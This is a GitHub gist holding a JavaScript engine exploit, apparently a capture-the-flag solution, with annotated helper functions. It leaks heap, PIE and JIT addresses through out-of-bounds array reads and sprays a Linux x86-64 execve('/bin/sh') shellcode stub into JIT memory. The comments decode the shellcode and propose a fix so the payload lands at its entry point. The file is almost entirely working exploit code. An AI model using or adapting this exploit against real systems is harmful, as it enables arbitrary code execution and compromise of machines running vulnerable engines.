akiym/poteti.js Secret

Last active December 1, 2018 14:29
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save akiym/966b3d24146edb685b8a08edee551de2 to your computer and use it in GitHub Desktop.
Save akiym/966b3d24146edb685b8a08edee551de2 to your computer and use it in GitHub Desktop.
// The only object the rest of the script touches: a one-element array whose
// storage is later read and written far beyond index 0 (a[0x3a], a[0x1e83a],
// a[t..t+10000]). The literal form is presumably what the offsets below were
// tuned against -- keep it as is; the engine bug that makes those accesses
// possible is not visible in this file.
var a = ["AAAA"];
/**
 * Reinterpret the 8 raw bytes of a double as an unsigned 64-bit integer.
 *
 * Element 0 of the Uint32 view is taken as the low word and element 1 as the
 * high word, i.e. the typed-array (host) byte order is assumed to be
 * little-endian -- the same convention i2_to_d uses when laying out bytes.
 *
 * @param {number} d - double whose bit pattern is wanted (typically a leaked pointer)
 * @returns {number} hi * 2^32 + lo; exact only while the result is below 2^53
 *   (high word < 0x200000), which holds for user-space addresses but not for
 *   arbitrary 64-bit values -- bits are silently lost beyond that.
 */
function lf_to_i(d){
var raw = new ArrayBuffer(8);
new Float64Array(raw)[0] = d;
var words = new Uint32Array(raw);
var lo = words[0];
var hi = words[1];
return hi * 0x100000000 + lo;
}
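/**
 * Inverse of lf_to_i: build the double whose bit pattern is the 64-bit value x.
 *
 * Fix: the original wrote the two halves as [x / 2^32, x % 2^32], which puts
 * the HIGH word into element 0 of the Uint32 view -- the slot lf_to_i and
 * i2_to_d treat as the LOW word -- so lf_to_i(i_to_lf(x)) !== x. The halves
 * are now stored low word first, matching the other two helpers.
 *
 * @param {number} x - non-negative integer below 2^53 (larger values have
 *   already lost bits as a double; negative values wrap through ToUint32)
 * @returns {number} double with the same 8 bytes as x (may be NaN/denormal)
 */
function i_to_lf(x){
var lo = x % 0x100000000;
// Uint32Array applies ToUint32, which drops the fractional part of the quotient.
var hi = x / 0x100000000;
return new Float64Array(new Uint32Array([lo, hi]).buffer)[0];
}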
/**
 * Pack a [hi32, lo32] pair into the double that carries those 8 bytes.
 *
 * x[1] lands in element 0 of the Uint32 view (low word) and x[0] in element 1
 * (high word); with a little-endian host this makes the bytes of x[1] come
 * first in memory. Used to smuggle raw machine-code bytes through array writes.
 *
 * @param {number[]} x - two-element array [hi, lo]; each is coerced with ToUint32
 * @returns {number} double whose bit pattern is hi:lo
 */
function i2_to_d(x){
var raw = new ArrayBuffer(8);
var words = new Uint32Array(raw);
words[0] = x[1];
words[1] = x[0];
return new Float64Array(raw)[0];
}
// Exploit body. Everything from here on relies on the target engine letting
// `a` (one element) be indexed far out of bounds after these two pops; the
// bug that makes that possible is not visible in this file -- confirm on the target.
a.pop()
a.pop()
// Out-of-bounds reads: each a[idx] comes back as a double and is turned into
// an address by lf_to_i. The index and subtraction constants are specific to
// one build of the target; nothing here derives them. array_addr, pie_addr
// and jit_addr are implicit globals (no var). `print` is the host shell's
// builtin, not part of the language.
array_addr = lf_to_i(a[0x3a]) - 0x3498
print(array_addr)
pie_addr = lf_to_i(a[0x3c])
print(pie_addr)
jit_addr = lf_to_i(a[0x1e83a]) - 0x8
print(jit_addr)
// Index into `a` at which an 8-byte element write lands on jit_addr. Assumes
// both addresses are 8-byte aligned so the division is exact -- not checked;
// a fractional t would make every write below land at a fractional index.
var t = (jit_addr-array_addr)/8;
// Payload as four [hi32, lo32] pairs (see i2_to_d). Laid out little-endian the
// 32 bytes are: 48 31 C0 50 5E 50 5A 50 48 BF 2F 2F 62 69 6E 2F 73 68 48 C1
// EF 08 57 54 5F B0 3B 0F 05 90 90 90 -- the imm64 is "//bin/sh" and it ends
// in mov al,0x3b; syscall, so this looks like a Linux x86-64 execve("/bin/sh")
// stub; disassemble to confirm before reusing.
sc = [[1348096094, 1354772808], [795765090, 791658312], [1414990063, 3242748019], [2425393157, 255570015]];
// Out-of-bounds writes: spray the 4-double payload 10001 times starting at the
// JIT region. NOTE(review): the phase is `i % sc.length`, taken from the
// absolute index rather than from t, so unless t is a multiple of 4 the copy
// that begins at jit_addr starts mid-stub; `sc[(i - t) % sc.length]` would
// anchor the first instruction at jit_addr. Left as is since the intended
// entry point is not visible here.
for (var i=t; i<t+10001; i++) {
a[i] = i2_to_d(sc[i%sc.length]);
}